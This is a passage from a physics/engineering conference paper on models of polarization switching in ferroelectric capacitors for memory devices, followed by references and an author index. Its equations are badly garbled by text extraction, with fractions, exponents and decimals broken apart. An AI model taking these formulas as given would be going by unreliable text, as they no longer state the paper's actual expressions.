Solution of Eq. (14) under the initial condition P(0) = −P0 (−PS < P0 < 0), is given by the expression ⎡ ⎤ t 1 + P0 PS 1 P = PS th⎣ ln + υ e−α / E(t) dt ⎦, (15) 2 1 − P0 PS 0
which is more convenient to write in the form P =1− PS
2 1+
1+P0 / PS 1−P0 / PS
exp 2υ
t
.
(16)
e−α / E(t) dt
0
Relationships (15) or (16) determine a monotonically increasing function of time, which varies from P0 , at t = 0, to PS , at t → ∞. Thus, the theoretical polarization switching time is unlimited. The change in polarization is determined by the integral in (16), which only increases with time and, at large t, expression (16) acquires an approximate form ⎡ ⎤ t 1 − P0 PS P ≈1−2 exp⎣2υ e−α / E(t) dt ⎦, (17) PS 1 + P0 PS 0
From comparison (17) and (2) it follows that at large t the polarization in the model of the second order is closer to saturation than in the first. At rather small t, the exponent in (16) will be close to zero, the polarization will be close to the initial value, and then it will also slowly increase with zero initial velocity. If P0 = −PS , then repolarization does not occur at all, i.e. P(t) = −PS = const. However, in reality, the final polarization is never equal to the spontaneous one. Therefore in expressions (15) and (16) P0 > −PS . More specific estimates of the time dependence of the polarization in the secondorder model will be made for the step intensity E(t) = E1(t). Step-by-Step Increase Field Intensity For step intensity, expression (16) takes the form P =1− PS 1+
2
1+P0 / PS 1−P0 / PS
, exp 2υte−α / E
(18)
on which the normalized families of switching (Fig. 3a) and polarization (Fig. 3b) char acteristics are constructed, where t = υt, E = E / α, P = P PS , and P 0 PS = − 0,99. The time required to switch the polarization from the initial value P 0 = P0 PS < 0 to the value P K = PK PS > 0 is determined by the expression 1 − P0 1 + PK 1 α/ E e ln (19) tK = . 2υ 1 − PK 1 + P0
758
I. Baraban et al.
Fig. 3. Normalized characteristics at step intensity according to the model of the 2nd order: a) switching, b) polarization.
Having accepted P0 = −0,99PS , PK = 0,9PS , E = α, and υ = (0, 8 − 4, 6) · 107 by expression (1.19), we find tK = tS ≈ (2, 4 − 14) · 10−7 s, that, about one and a half times more than in the 1st order model. If the switching of polarization is carried out by rectangular pulses of intensity E and duration tK , then the field intensity required to change the polarization from P0 < 0 (P0 > - PS ) to PK > 0, will be determined
s−1 ,
E=
α
. 1+P K 1−P0 −1 ln 2υtK · ln 1−P 1+P K
(20)
0
Since E > 0, the pulse duration must satisfy the requirement 1 − P0 1 + PK 1 ln , tK > 2υ 1 − PK 1 + P0
(21)
of which, provided that P 0 = -0,99, P K = 0,9, and υ = (0, 8 − 4, 6) · 107 s−1 , we find tK ≥ (0, 89 − 5, 1) · 10−7 s, which is also approximately 1.5 times larger than in the 1st order model. If the pulse duration is taking tK = 10−6 s, α = 104 V/cm, then it would be found by expression (20) E = ES ≈ (0, 41 − 1, 5) · 104 V/cm, which is also larger than in the 1st order model. By expression (18) it is easy to find that the time at which the rate of change of polarization is the maximum and the maximum current density coincides with the time of change of the sign of polarization 1 α / E 1 − P0 PS . e ln (22) t 0 = tm = 2υ 1 + P0 PS
Mathematical Model of Electric Polarization Switching
759
Taking P0 = -0,99PS , E = α, and υ = (0, 8 − 4, 6) · 107 s−1 , it would be received t0 = tm = (0, 2 − 1, 2) · 10−7 s. Thus, in the second-order model, the maximum current density, even with a step change in voltage, is delayed in time. The density of the polarization current in the second-order model is determined by the ratio δ(t) =
f (t) dP = 4PS υe−α / E 2 , dt 1 + f (t)
where f (t) =
(23)
1 + P0 PS exp 2υte−α / E . 1 − P0 PS
At t = tm function f (tm ) = 1 and the maximum value of the current density δm = υPS e−α / E ,
(24)
does not depend on the initial value of polarization and is twice less than in the 1st order model at the beginning of the repolarization process (see (7) at P0 = -PS ) and is for the same material δm ≈ (1 − 5, 9) · 102 A/cm2 . It should be expected that with an exponential increase intensity (see (8)), the estimates will not change significantly with a sufficiently steep increase intensity, i.e. when the value γ is large enough.
3 Crystallization Model of Polarization Switching The physical mechanisms of repolarization of ferroelectrics in its main features are similar to those observed in the crystallization of the melt during its cooling. In the works of Kolmogorov A.N. [11] and Avrami M. [12] developed geometric-probabilistic models of melt crystallization, which were transferred by Ishibashi Y. [13] to ferroelectric repolarization processes. The Main Mechanisms of Repolarization and Accepted Simplifications • Origin of inverse polarity domains (domains with spontaneous field-oriented polarization). • Rapid growth of the formed domains in the direction of the field through the entire thickness of the ferroelectric without a noticeable change in its transverse dimensions (formation of needle domains). • Lateral growth of needle domains in the directions of the transverse fields. • Overlapping domains in the process of its lateral growth. Repolarization can also begin with the growth of hidden and field-oriented embryos of domains that were in the ferroelectric before the application of the field, and continue in accordance with the described sequence. Significant influence on the process of emergence of embryos and its growth is created by the surface of the ferroelectric, taking into account which causes the greatest
760
I. Baraban et al.
difficulties. Therefore, the crystallization model of ferroelectric repolarization is based on the following simplifications: • The volume of ferroelectric is considered unlimited and the influence of the surface on the formation and growth of domains can be neglected. • Uniform distribution of the centers of formation of embryos of domains or hidden embryos oriented on the field. This allows the nucleation process to be characterized by intensity χ (t), which is equal to the number of embryos occurring per unit volume per unit time (χ -process). Similarly, the initial distribution of hidden domain embryos is characterized by the density of embryos β, that is, the number of embryos per unit volume (β-process). • All embryos of domains, regardless of the place and time of their origin, as well as hidden embryos, have the same shape and retain it during growth. This allows you to determine the volume of domains at any time as a function of one spatial variable radius R(t) and one parameter of the k-form factor. If the domains are spherical, then its volume 43 π R3 and shape ratio k = 43 π . In the cylindrical shape of domains, its volume is equal 2π R3 (provided that the height of the cylinder is equal to its diameter) and form factor k = 2π . In the cubic form of domains k = 8, if all the edges of the cube are equal 2R. For ferroelectric thin films, the repolarization time is determined mainly by the lateral growth of the needle domains. In this case, with a cylindrical shape of the domains, their volume is equal π R2 h, where h film thickness, and form factor k = π h. • At every moment the speed of movement of the domain walls in all directions is the same. When the fronts of adjacent domains collide, the oncoming domains continue to grow without noticing each other. This simplification increases the volume of the repolarized part of the ferroelectric, and to compensate for this phenomenon, it is assumed that the repolarized and nonpopolarized fractions of any unit volume taken together do not exceed a unit volume. Formulation of a Mathematical Model Consider a unit volume in an unlimited ferroelectric in which time t = 0 created an electric field with a voltage sufficient to reorient the polarization. Denote by q(ξ ) not repolarized fraction of a unit volume for a moment ξ > 0. Then, the number of germs of field-oriented domains that arise over time from ξ to ξ + d ξ at χ –process will be equal to dn(ξ ) = χ (ξ )q(ξ )d ξ . The formed embryos will begin to grow for a moment t > ξ its radius will be defined t R(ξ, t) = RC +
V (t)dt,
(25)
ξ
where RC – the average radius of the embryos of the domains at the time of its occurrence or the average radius of the hidden domains of reverse polarity, and V (t) is the domain growth rate. If V (t) = V = const, then expression (25) takes the form R(ξ, t) = RC + V (t − ξ )
Mathematical Model of Electric Polarization Switching
761
Increasing the repolarized fraction of a unit volume over time from ξ to t (t > ξ ), due to embryos that have arisen over time (ξ, ξ + d ξ ) will be dQ(ξ ) = χ (ξ )q(ξ )kRn (ξ )d ξ.
(26)
Since the increase in the repolarized fraction of a unit volume is equal to the decrease in the non-polarized fraction, the latest will be determined dq(ξ ) = −dQ(ξ ) = −χ (ξ )q(ξ )kRn (ξ, t)d ξ.
(27)
Rewriting relation (26) in the form of equation dq(ξ ) = −χ (ξ )RRn (ξ, t)d ξ q(ξ )
(28)
and integrating it in the range from 0 to t, we obtain the time dependence of the nonpolarized part of the unit volume q(t) = q(0) exp(−A)
(29)
where t A=
χ (ξ )kRn (ξ, t)d ξ
(30)
0
characteristic parameter χ -process, for which q(0) = 1. In the case of β-process can be considered χ (ξ ) = βδ(ξ ), where δ(ξ ) is the unit impulse function, and convert expression (30) to the form A = βkRn (t),
(31)
where R(t) is determined by the expression (25), at ξ = 0. Also for β-process, q(0) < 1 the proportion of unit volume that is accounted for by embryos of hidden field-oriented domains. Since this fate is almost impossible to determine, the fate is assumed to be for β-process, q(0) = 1. Repolarized fraction of a unit volume χ - and β-processes Q(t) = 1 − exp(−A).
(32)
Determination of Polarization and Current Density χ -Process Since polarization is defined as the total dipole moment of a unit volume, assuming that in the repolarized part of the ferroelectric polarization PS , and in non-polarized -PS , it will be obtained P = PS Q(t) − PS q(t) = PS 1 − 2 exp(−A) , (33) and the current density δ=
dP = 2PS A exp(−A), dt
(34)
762
I. Baraban et al.
where A is determined by the ratio (30), and dA A = = knV (t) dt
t χ (ξ )Rn−1 (ξ, t)d ξ.
(35)
0
In the simplest case χ (ξ ) = χ = const, V (t) = V∞ exp −α E = const and provided that RC = 0, expressions (33) and (34), considering (25), are transformed into the forms t n+1 P , (36) = 1 − 2 exp −A0 e−nα / E · PS n+1 t n+1 δ = 2A0 PS e−nα / E · t n exp −A0 e−nα / E , (37) n+1 n . where A0 = χ kV∞ At repolarization of thin films by lateral growth of needle cylindrical domains
P = 1 − 2 exp −A0 e−2α / E · t 3 , PS 1 −2α / E 2 −2α / E 3 · t exp − A0 e t , δ = 2A0 PS e 3
(38) (39)
where A0 = 13 π χ hV 2 (h – film thickness). The external structure of expressions (36) or (38) is similar to the similar expression (4) for polarization in the 1st order model: the arguments of the external exponents of both expressions are determined by the product of two factors, one of which is a field intensity function and the other a time function. However, in the crystallization model, there is a multiplier in the exponent n ≥ 1. Therefore, when n > 1 the polarization characteristic of the crystallization model will be shifted to the right (towards higher intensities) compared to the physical model of the 1st order. The time factor in the exponent (see (36)) has the power n + 1 > 1. It follows that the switching characteristic will grow more slowly at the beginning, cross the time axis at a greater angle and approach the saturated value more slowly. Numerical estimates of the switching field intensity and its relationship to the duration of the switching pulse, as well as the maximum value of the current density and the corresponding moment, are complicated by the lack of numerical values of the parameters of the crystallization model, such as χ , V∞ , k and n (n – can take small values when mixed χ - and β-processes). These parameters should be determined by comparing experimental and theoretical results so that differences between them are minimal. For convenience of such comparison it is expedient to pass to dimensionless parameters. Standardization of Crystallization Model Parameters (χ -Process) It is expedient to take as normalizing values saturation polarization PS , the maximum value of current density δm and time tm, at which this maximum is observed. Rationing will be carried out for the previously mentioned simplest case χ (ξ ) = χ = const,
Mathematical Model of Electric Polarization Switching
763
V (t) = V = const, but RC = 0. Under these conditions, relation (30), taking into account (2.1), can be given the form A=
t + tC t0
n+1
−
tC t0
n+1 ,
(40)
where RC , t0 = tC = V
n+1 kχ V n
1 n+1
,
(41)
and convert expressions (33) and (34) n+1 t+t n+1 P tC − tC 0 = 1 − 2 exp e , PS t0 n+1 t+t n+1 t + tC n PS tC − tC 0 δ = 2 (n + 1) exp e . t0 t0 t0
(42)
(43)
Time t C is the time of doubling the radius of the embryo, and time t 0 has the content of the time constant χ -process, i.e. t 0 is the time during which the variable component of polarization in expression (24) decreases by e ≈ 2, 718 times, provided that the time t C is negligibly small. Analysis of expression (43) to the extremum gives the following values of the maximum current density δm and time t m , respectively n+1 1 PS tC n n+1 δm = 2 exp , (n + 1)(n/ e) t0 t0 1 n+1 n tC − tm = t0 . n+1 t0
(44)
(45)
From expression (45) it follows that the time constant, depending on the dimension of growth n, varies within t0 ≈ (0, 71 − 0, 93)(tm + tC ), that is, it can be as small t m (t C – small), and as a large t m (t C – large). Generalized parameter χ –process is a dimensionless quantity ! " n+1 n δm tm a 2n exp = −1 , PS 1+a n+1 1+a where a = tC tm . Entering further the normalized time θ = t tm , convert expressions (42), (43) to the form P(θ ) − n = 1 − 2K1 e n+1 PS
a+θ 1+a
n+1
,
(46)
764
I. Baraban et al. n+1 n a+θ a + θ n − n+1 δ(θ ) 1+a = K2 e , δm 1+a
where
(47)
n+1 n a K1 = exp , n+1 1+a n K2 = exp . n+1
nuclei is negligibly small The value of K 1 = 1, if the initial radius of the domain (tC = tm ), and slowly increases with its increase (∂K1 ∂a = 0, at a = 0). The value K2 with increasing dimension of domains from n = 1 to n = 3, increases from about 1.6 to 2.1. Determination of Polarization and Current Density β-Process The polarization and current density of the β-process are also determined by the ratios (42) and (43), in which the parameter A is given by expression (31), and the corresponding derivative A = βknV (t)Rn−1 (t). If V (t) = V∞ exp −α E = const and RC = 0, then the polarization and current density of the β-process are determined nα P = 1 − 2 exp −B0 e− E t n , PS nα nα δ = 2B0 ne− E t n−1 exp −B0 e− E t n ,
(48) (49)
n . where B0 = βkV∞ At repolarization of thin films by lateral growth of needle cylindrical domains
2α P = 1 − 2 exp −B0 e− E t 2 , PS 2α 2α δ = 4B0 e− E t exp −B0 e− E t 2 ,
(50) (51)
2 . where B0 = βπ hV∞ All that has been said before regarding the comparison of characteristics χ –process and physical model of the 1st order, as well as the possibility of numerical estimates of parameters χ –process, are preserved for β-process. So for the β-process under the condition, that both V (t) = V = const and RC = 0 expressions (42) and (43) are converted to the form # $ t + tC n , (52) P = PS 1 − 2 exp − t0
Mathematical Model of Electric Polarization Switching
δ=2
PS t + tC n−1 t + tC n , n exp − t0 t0 t0
765
(53)
where tC = RC V i t0 = (V n kβ)−1/ n is a quantities which physical meaning is the same as for χ –process. The maximum current density δm and the corresponding time tm , for the β-process are determined by expressions 1/ n PS n − 1 n−1 δm = 2 , n t0 e n − 1 1 / n tC tm = t0 − , n t0
(54)
(55)
by which we find δm t m tm n−1 = 2(n − 1) exp − . PS tm + tC n
(56)
Normalized characteristics of the β- process are determined similarly
n
P(θ ) − n−1 θ+a = 1 − 2e n 1+a , (57) PS n θ+a a + θ n−1 − n−1 δ(θ ) n 1+a = K3 e , (58) δm 1+a where K3 = exp n − 1 n . A comparison of the normalized characteristics (46) and (47) of the χ –process and the corresponding characteristics (57) and (58) of the β-process shows that the latest have a unit smaller dimension. Because it can actually take place at the same time χ – and β–processes, then the dimensional growth of the domains may take non-target values. The final conclusions about the adequacy of crystallization models to the processes of repolarization of ferrocapacitors could be made by comparing experimental and theoretical results under the conditions of optimal determination of the parameters of crystallization models.
4 Analysis of the Influence of Polarizing Field Inhomogeneity on the Characteristics of Ferrocapacitors Reducing the size of ferroelectric memory elements and increasing the density of its packaging is accompanied by both a deterioration in the characteristics of the elements and an increase in parasitic connections between it [14]. These phenomena associated with the inhomogeneity of the polarizing field near the electrode boundaries are called boundary field effects [15].
766
I. Baraban et al.
The level of influence of the field effects at the characteristics of ferroelectric capacitors depends on the relationship between the thickness of the ferroelectric film and the size and shape of the electrodes, as well as the dielectric properties of the film and the environment. For real capacitor storage batteries, it is almost impossible to estimate the influence of all factors on its dynamic characteristics. Therefore, we analyzed the influence of the field effects on the polarization characteristic in the static mode for the simplest form of electrodes and provided that the ferromaterial has a rectangular hysteresis loop.
Fig. 4. Distribution of plane-parallel electric field intensity: bold - electrode lines; thin - lines of equal intensity.
In Fig. 4 one of the options for the relative position of the boundaries of the electrodes of two adjacent capacitors made on a common ferroelectric film is shown. The electrodes of capacitors with static potentials ϕ1 = ϕ and ϕ2 = ϕ3 = 0 are represented by bold lines, and the figure of the distribution of traces of surfaces of equal intensity of a plane-parallel field - by thin lines, next to which the relative values of the voltage are indicated [16]. Each line of equal voltage divides the ferroelectric into two parts: in one part the voltage is less than on the line, and in the other - more. The directions of intensity reduction are set by the field lines l1 and l2 , which limit the working area with inhomogeneous intensity selected when reading or writing the element (power line l1 is the last out of the electrode 1 and ends at the common for both capacitors electrode 3; to the left of the line the electric field is almost homogeneous). As the voltage increases (potential growth ϕ) the region near the electrode 1 is first repolarized (one of such areas in Fig. 4 is shaded). Then the repolarized region expands,
Mathematical Model of Electric Polarization Switching
767
increasing the average value of the polarization of the working region of the ferrocapacitor. The corresponding dependence of the average polarization on the field intensity is shown in Fig. 5, where curve 1 is the initial polarization characteristic, 2 is the polarization characteristic at the cyclic change of the field strength, the intensity of which is insufficient to achieve saturation polarization and 3 is the limiting polarization characteristic. Thus, the rectangular hysteresis loop of the ferromaterial due to the inhomogeneity of the polarization field, is converted into a non-rectangular polarization characteristic of the ferrocapacitor [17–19].
Fig. 5. Hysteresis loops of a ferroelectric capacitor in an inhomogeneous electric field: 1 - initial; 2 - partial; 3 – bordered.
Reducing the rectangularity of the polarization characteristic has a corresponding effect on the switching characteristic, i.e. the polarization increases more slowly in time at the beginning and more slowly approaches the saturation at the end. As a result, the polarization switching is delayed, the switching time increases and the maximum value of the repolarization current decreases. The latter requires an increase in the size of the
768
I. Baraban et al.
electrodes of thin-film ferrocapacitors and a corresponding decrease in the density of its packaging. The negative effect of the edge effects of the field at the ferroelectric memory is also manifested in the fact that the areas of high voltage near the boundaries of the electrodes, not selected when reading or writing elements, will be parasitically repolarized. Parasitic repolarization most likely cannot lead to erroneous reading, because the regions of such repolarization are small. However, to prevent, even with unlikely erroneous readings, it is necessary to choose such variants of matrix addressing, in which the zones of parasitic repolarization will be minimal. In addition, parasitic repolarization of adjacent elements will reduce its read signal when these elements are selected. To eliminate this effect, it is also needed to increase the size of the elements and the distance between it. To quantify the influence of the field effects on the characteristics of ferrocapacitors, we introduce the concept of the coefficient of rectangularity of the polarization characteristic, which is determined by the ratio of coercive intensity (intensity at which polarization changes sign) to voltage at which the polarization is 0.9PS (PS is the saturation polarization). The static coefficient of rectangle is easily determined by the static hysteresis loops of Fig. 5. So for the boundary hysteresis loop (curve 3) the coefficient of rectangle KP ≈ 1 1, 7 ≈ 0, 6. The obtained value corresponds to the ferrocapacitor at Fig. 4, in which the working area of the ferroelectric is limited by power lines l1 and l2 . If the working area in the direction of the homogeneous field is larger, then the the coefficient of rectangle is greater. The value of the rectangularity coefficient KP = 0, 6 should be considered the minimum allowable. This is the coefficient of rectangularity should be considered when determining the minimum size of thin-film ferrocapacitors, when designing ferroelectric storage devices [17–19].
5 Conclusions Literature and Internet researches on switching of polarization of ferroelectric capacitors are carried out. It has been found that the research methods developed in recent decades from the first principles are suitable only for modeling a limited range of basic devices of nanoscale of small complexity. On the other hand, the lack of a universal macroscopic model of polarization switching, true for all classes of ferroelectrics, led to the development of “behavioral” models, the parameters of which are determined by experimental studies of storage cells manufactured according to certain technological standards. Classical models of switching the polarization of ferroelectric capacitors have been studied, according to which families of switching and polarization characteristics are constructed for different laws of change in time of polarizing fields. According to the research results, numerical estimates of the model parameters (maximum value of current density, switching time, dynamic coercive voltage) are carried out, which correspond to the experimental results obtained for capacitors on bulk ferroelectrics. The suitability of the studied models to describe the switching of the polarization of thin-film ferrocapacitors of nanoscale is clarified after the manufacture of such capacitors and the measurement of its parameters.
Mathematical Model of Electric Polarization Switching
769
Crystallization models of polarization switching have been developed, the parameters of which should be determined by comparing theoretical and experimental results so that the differences between it are minimal. The calculations of the polarizing field near the boundaries of the electrodes of thinfilm ferrocapacitors are performed, on which the diagrams of voltage distribution in its working zones are constructed. According to the results of calculations, the polarization characteristics of ferrocapacitors are constructed, which reveal the influence of the field effects on the rectangularity of the polarization and switching characteristics. It has been found that reducing the rectangularity of the characteristics delays the polarization process over time and increases the switching time, reduces the maximum value of the polarization current density and strengthens the parasitic bonds between capacitors made on a single ferroelectric film. These negative phenomena limit both the minimum size of the elements and the density of their packaging, as well as possible options for matrix addressing of storage devices. In addition, the read signal of the selected elements is reduced due to the parasitic polarization of the electrode layers, which occurs when the element was adjacent but unselected. To take into account the negative impact of the field effects of the field on the ferroelectric RAM8, it is proposed to use the coefficient of rectangularity of the polarization characteristics, the value of which depends on the ratio between the electrode size and the thickness of the ferroelectric film.
References 1. You, W., Su, P., Hu, C.: A new 8T hybrid nonvolatile SRAM with ferroelectric FET. IEEE J. Electron Devices Soc. 8, 171–175 (2020). https://doi.org/10.1109/JEDS.2020.2972319 2. Kobayashi, M., Tagawa, Y., Mo, F., Saraya, T., Hiramoto, T.: Ferroelectric HfO2 tunnel junction memory with high TER and multi-level operation featuring metal replacement process. IEEE J. Electron Devices Soc. 7, 134–139 (2019). https://doi.org/10.1109/JEDS.2018.288 5932 3. Yves, O., Frank, I.: Consistent and efficient modeling of the nonlinear properties of ferroelectric materials in ceramic capacitors for frugal electronic implants. Sensors 20, 4206 (2020). https://doi.org/10.3390/s20154206 4. Dobrusenko, S.A.: Segnetoelectricheskie OZU firmy Ramtron International. – Electronika: nauka, tehnologiya, biznes, №4:14–20 (2003) 5. Olsommer, Y., Ihmig F., Müller, C.: Modeling the nonlinear properties of ferroelectric materials in ceramic capacitors for the implementation of sensor functionalities in implantable electronics. In: Proceedings of the 6th International Electronic Conference on Sensors and Applications, vol. 42, p. 61 (2020). https://doi.org/10.3390/ecsa-6-06575 6. Raman, R.T., Ajoy, A.: SPICE-based multiphysics model to analyze the dynamics of ferroelectric negative-capacitance–electrostatic MEMS hybrid actuators. IEEE Trans. Electron Devices 67(11), 5174–5181 (2020). https://doi.org/10.1109/TED.2020.3019991 7. Praveen, J., Kumar, M., Sreecharan, B.R., Shruthi, I.T., Rachita, B.V.G.: Design of memory interface and programmer for ferroelectric random access memory (FeRAM). Int. J. Adv. Sci. Technol. 29(08), 4799–4806 (2020). ISSN: 2005–4238 IJAST 8. Jiang, B., Lee, J.C., Zurcher, P.: Modeling ferroelectric capacitor switching using a parallelelements model. Integr. Ferroelectr. 16(1–4), 199–208 (1997). https://doi.org/10.1080/105 84589708013042
770
I. Baraban et al.
9. Tamura, T., Arimoto, Y., Ishiwara, H.: A parallel element model for simulating switching response of ferroelectric capacitors. IEICE Trans. Electron. E84-C(6), 785–790 (2001) 10. Musielak, Z.E., Davachi, N., Rosario-Franco, M.: Special functions of mathematical physics: a unified Lagrangian formalism. Mathematics 8(3), 379 (2020). https://doi.org/10.3390/mat h8030379 11. Andrei, N.: Kolmogorov Prepared by VM Tikhomirov. Wolf Prize in Mathematics, v.2, World Scientific, pp. 119–141 (2001). ISBN 9789812811769 12. Faleiros, A.C., Rabelo, T.N., Thim, G.P.: Kinetics of phase change. Mater. Res. 3(3), 51–60 (2000). https://doi.org/10.1590/S1516-14392000000300002 13. Li, L., Xie, L., Pan, X.: Real-time studies of ferroelectric domain switching: a review. In: Reports on Progress in Physics, vol. 82(12). Published 7 November, IOP Publishing Ltd (2019). https://doi.org/10.1088/1361-6633/ab28de 14. Semenov, A.O., Baraban, S.V., Osadchuk, O.V., Semenova, O.O., Koval, K.O., Savytskyi, A.Y.: Microelectronic pyroelectric measuring transducers. In: Tiginyanu, I., Sontea, V., Railean, S. (eds.) ICNBME 2019. IP, vol. 77, pp. 393–397. Springer, Cham (2020). https:// doi.org/10.1007/978-3-030-31866-6_72 15. Semenov, A.A., Voznyak, O.M., Vydmysh, A.A., et al.: Differential method for measuring the maximum achievable transmission coefficient of active microwave quadripole. J. Phys: Conf. Ser. 1210, 1–8 (2019). https://doi.org/10.1088/1742-6596/1210/1/012125 16. Semenov, A.A., Baraban, S.V., Baraban, M.V., et al.: Development and research of models and processes of formation in silicon plates p-n junctions and hidden layers under the influence of ultrasonic vibrations and mechanical stresses. In: Key Engineering Materials, vol. 844, pp. 155–167. Trans Tech Publications, Ltd, (2020). https://doi.org/10.4028/www.scientific. net/kem.844.155 17. Semenova, O, Semenov, A., et al.: The neural network for vertical handover procedure. In: 2020 IEEE International Conference on Problems of Infocommunications. Science and Technology (PIC S&T), 2020, Kharkiv, Ukraine, pp. 753–756 (2020). https://doi.org/10.1109/ PICST51311.2020.9468033 18. Semenov, A.A., Semenova, O.O., Voznyak, O.M., Vasilevskyi, O.M., Yakovlev, M.Y.: Routing in telecommunication networks using fuzzy logic. In: 2016 17th International Conference of Young Specialists on Micro/Nanotechnologies and Electron Devices (EDM), pp. 173–177 (2016). https://doi.org/10.1109/EDM.2016.7538719 19. Semenova, O., Semenov, A., Koval, K., Rudyk, A., Chuhov, V.: Access fuzzy controller for CDMA networks. Int. Siberian Conf. Control Commun. (SIBCON) 2013, 1–2 (2013). https:// doi.org/10.1109/SIBCON.2013.6693644
Author Index
A Arhat, Roman 459 Atamanchuk, Petro 249 Atamanchuk, Viktoriia 249 B Baikenov, Alimzhan 177 Baraban, Inna 749 Baraban, Mariia 749 Baraban, Serhii 749 Batrachenko, Olexandr 363, 386 Bazeliuk, Nataliia 275 Bazilo, Constantine 3, 260, 411 Bielinskyi, Andrii 323, 425 Bilets, Daria 446 Bondar, Serhii 208 Bondarenko, Yevhenii 113 Bondarenko, Yuliia 113 Borodiyenko, Oleksandra 275 Boyko, Victor 224 Bryukhanov, Arkady 425 Buriachok, Volodymyr 533 C Chalyy, Kyrylo 515 Chumachenko, Dmytro 503 Chumachenko, Tetyana 503 D Derevianko, Igor 459 Dluhopolskyi, Oleksandr 346 Donchev, Ivan 425 Drach, Iryna 275 Dyachok, Dmytro 425 F Faure, Emil 3, 177 Fedorov, Eugene 113
Frolova, Liliya 567 Frolova, Liudmyla 260 Fursenko, Tetiana 65 G Gabrousenko, Yevhen 13, 196 Gagnidze, Avtandil 619 Gasii, Grygorii 102 Gnatyuk, Sergiy 235, 619, 656 Grebenovych, Julia 30 H Halchenko, Volodymyr 411 Hasii, Olena 102 Holubnychyi, Oleksii 13, 196 Honcharov, Artem 83 Hrynzovskyi, Anatolii 515 Hryshchenko, Yurii 65 I Iashvili, Giorgi 619, 656 Iavich, Maksim 619, 656 Ivashchuk, Oleg 51 K Kataeva, Yevheniia 149 Kavetskyy, Taras 425 Khlevna, Iulia 149 Khlevny, Andrii 149 Khrulov, Mykola 162 Kiv, Arnold 425 Klevanna, Ganna 149 Korshun, Nataliia 533 Kostenko, Anton 459 Kovalenko, Andriy 715 Kovalenko, Stanislav 260 Krasnozheniuk, Yana 635, 679 Kryvenko, Inna 515
© The Editor(s) (if applicable) and The Author(s), under exclusive license to Springer Nature Switzerland AG 2023 E. Faure et al. (Eds.): ITEST 2022, LNDECT 178, pp. 771–773, 2023. https://doi.org/10.1007/978-3-031-35467-0
772
Kulakov, Pavlo 599 Kulakova, Anna 599 Kulia, Yuliia 732 L Lavdanskyi, Artem 3 Lebedev, Vladimir 446 Liubchenko, Kostiantyn 260 Lizunkov, Oleksandr 102 Lukashin, Viktor 425 Lutskyi, Maksym 235 Lytovchenko, Volodymyr 299 M Makarenko, Iryna 113 Maksymchuk, Olena 346 Maksymov, Anton 131 Martovytskyi, Vitalii 715 Matviychuk, Andriy 323 Meniailov, Ievgen 503 Miroshnichenko, Denis 446 Mogilei, Sergii 83 Muradyan, Olena 503 Mysiak, Vsevolod 446 N Nedonosko, Petro 30 O Odarchenko, Roman 208, 619, 656 Onyshchenko, Borys 30 Orel, Vadim 459 Ostroumov, Ivan 51
Author Index
S Salenko, Alexandr 459 Samusenko, Aleksandr 459 Savchenko, Dmytro 446 Savchenko, Mykhailo 552 Savchenko-Synyakova, Yevheniya Semenov, Andriy 599, 749 Semenova, Olena 599, 749 Semerikov, Serhiy 323 Sergeyeva, Olga 567 Shcherba, Anatoly 177 Shcherbyna, Olga 196 Shmygaleva, Tat’yana 484 Shostko, Igor 732 Sievierinov, Oleksandr 715 Simonov, Sergei 656 Skladannyi, Pavlo 533 Skrynnik, Ivan 102 Skutskyi, Artem 3 Slatvinska, Valeria 224 Slobodian, Olexandr 13 Slobodianiuk, Olena 275 Smirnov, Oleksii 208 Smirnova, Tatiana 208 Sokolov, Volodymyr 533 Soloviev, Vladimir 323, 425 Solovieva, Victoria 323 Srazhdinova, Aziza 484 Stupka, Bohdan 177 Suprunenko, Oksana 30 Synytsya, Kateryna 552 Sysoienko, Svitlana 162
P Pastushenko, Mykola 679 Petrenko, Yuriy 260 Petroye, Olha 275 Pidhornyy, Mykola 299 Podskrebko, Oleksandr 346 Polozhentsev, Artem 235 Prodanova, Larysa 582
T Taranenko, Anatolii 13, 196 Tazetdinov, Valeriy 162 Teslia, Iurii 149 Tokar, Liubov 635 Trembovetska, Ruslana 411 Tryus, Yurii 83, 131 Tsurkan, Daniil 459 Tychkova, Natalia 411 Tykhomyrova, Tetiana 446
R Romanenko, Victor 65 Ruban, Andrii 260 Ruban, Igor 715 Rudyk, Andrii 599, 749
V Vasilenko, Mykola 224 Vasylyshyn, Volodymyr 697 Verkhovets, Oleksii 235 Volosheniuk, Dmytro 208
552
Author Index
773
Voronenko, Iryna 177 Voznyak, Oleksandr 599 W Wołowiec, Tomasz
346
Y Yegorchenkov, Oleksii 149 Yegorchenkova, Nataliia 149
Z Zagirnyak, Mykhaylo 459 Zakharova, Oksana 582 Zaliskyi, Maksym 65, 196 Zatonatska, Tetiana 346 Zharova, Olena 13 Zholtkevych, Grigoriy 503 Zhyltsov, Oleksii 533 Zinchuk, Andryi 459